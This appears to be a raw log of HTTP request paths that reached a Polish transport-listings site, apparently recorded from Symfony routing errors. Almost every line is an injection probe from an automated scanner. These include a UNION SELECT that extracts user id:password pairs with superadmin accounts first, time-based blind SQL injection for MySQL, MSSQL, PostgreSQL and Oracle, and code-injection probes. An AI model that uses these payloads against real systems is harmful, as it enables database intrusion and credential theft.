/ws/msw/tenant/%27%20union%20select%20%28select%20ID%20from%20SGMSDB.DOMAINS%20limit%201%29%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%28select%20concat%28id%2C%20%27%3A%27%2C%20password%29%20from%20sgmsdb.users%20where%20active%20%3D%20%271%27%20order%20by%20issuperadmin%20desc%20limit%201%20offset%200%29%2C%27%27%2C%20%27%27%2C%20%27\" at /var/www/clicktrans/vendor/symfony/http-kernel/EventListener/RouterListener.php:136, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): No routes found for \"/ws/msw/tenant/%27%20union%20select%20%28select%20ID%20from%20SGMSDB.DOMAINS%20limit%201%29%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%28select%20concat%28id%2C%20%27%3A%27%2C%20password%29%20from%20sgmsdb.users%20where%20active%20%3D%20%271%27%20order%20by%20issuperadmin%20desc%20limit%201%20offset%200%29%2C%27%27%2C%20%27%27%2C%20%27/
/if(now()=sysdate(),sleep(15),0)/category/meble
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*%2f/category/meble
/if(now()=sysdate(),sleep(15),0)/transportowe/bydgoszcz/
/firmy0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/transportowe/bydgoszcz/
/firmy0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z/transportowe/bydgoszcz/
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*%2f/transportowe/bydgoszcz/
/firmy-1%20waitfor%20delay%20'0:0:15'%20--%20/transportowe/bydgoszcz/
/firmyd4gzaQtl'))%20OR%20284=(SELECT%20284%20FROM%20PG_SLEEP(15))--/transportowe/bydgoszcz/
/firmyNG9NcaEN'%20OR%20938=(SELECT%20938%20FROM%20PG_SLEEP(15))--/transportowe/bydgoszcz/
/firmyhizWOX3W'%3b%20waitfor%20delay%20'0:0:15'%20--%20/transportowe/bydgoszcz/
/firmy/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*%2f/bydgoszcz/
/firmyg0fCPqBT')%20OR%20201=(SELECT%20201%20FROM%20PG_SLEEP(15))--/transportowe/bydgoszcz/
/firmy/transportowe-1%20waitfor%20delay%20'0:0:15'%20--%20/bydgoszcz/
/firmy'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/transportowe/bydgoszcz/
/firmy/transportowe0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/bydgoszcz/
/firmy/transportoweCH96Li2Q'%3b%20waitfor%20delay%20'0:0:15'%20--%20/bydgoszcz/
/firmy/transportowe'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/bydgoszcz/
/firmy/transportoweA4MkSwmm')%20OR%20676=(SELECT%20676%20FROM%20PG_SLEEP(15))--/bydgoszcz/
/firmy/transportowej42NasrA'))%20OR%20540=(SELECT%20540%20FROM%20PG_SLEEP(15))--/bydgoszcz/
/firmy/transportowevM85ZGF9'%20OR%20510=(SELECT%20510%20FROM%20PG_SLEEP(15))--/bydgoszcz/
/firmy/transportowe0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z/bydgoszcz/
/firmy/if(now()=sysdate(),sleep(15),0)/bydgoszcz/
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*%2f/category/ladunki
/if(now()=sysdate(),sleep(15),0)/category/maszyny-i-sprzet
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*%2f/category/maszyny-i-sprzet
/social-connect0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z/init/google
/if(now()=sysdate(),sleep(15),0)/category/ladunki
/social-connect-1%20waitfor%20delay%20'0:0:15'%20--%20/init/google
/if(now()=sysdate(),sleep(15),0)/auth/courier
/9287992-1%3b%20waitfor%20delay%20'0:0:15'%20--%20
/social-connect/inituNhpu3BC'))%20OR%20569=(SELECT%20569%20FROM%20PG_SLEEP(15))--/google
/social-connect'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/init/google
/social-connectPLLKVEIy'%3b%20waitfor%20delay%20'0:0:15'%20--%20/init/google
/9287992-1)%3b%20waitfor%20delay%20'0:0:15'%20--%20
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*%2f/auth/courier
/social-connect/init/google6x4dAQzp'%20OR%2066=(SELECT%2066%20FROM%20PG_SLEEP(15))--
/social-connectLzqTxfZP')%20OR%2021=(SELECT%2021%20FROM%20PG_SLEEP(15))--/init/google
/social-connect/if(now()=sysdate(),sleep(15),0)/google
/social-connect/init0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z/google
/social-connect/init/google'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
/92879920"XOR(9287992*if(now()=sysdate(),sleep(15),0))XOR"Z
/9287992LUBYVaf0'%3b%20waitfor%20delay%20'0:0:15'%20--%20
/wps/wcm/connect/'+or+'f5LNc'='f5LNc
/9287992*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
/if(now()=sysdate(),sleep(15),0)/init/google
/?page=2"%7C%7Csleep(27*1000)*dwedcf%7C%7C"&size=10
/?page="%2Bresponse.write(9072915*9910827)%2B"&size=10
/?page=2&size=";print(md5(31337));%24a="
/?page=20'XOR(2*if(now()=sysdate()%2Csleep(15)%2C0))XOR'Z&size=10
/?page=2*if(now()=sysdate()%2Csleep(15)%2C0)&size=10
/?page=2&size='%2Bresponse.write(9127349*9195496)%2B'
/?page=2&size=';print(md5(31337));%24a='
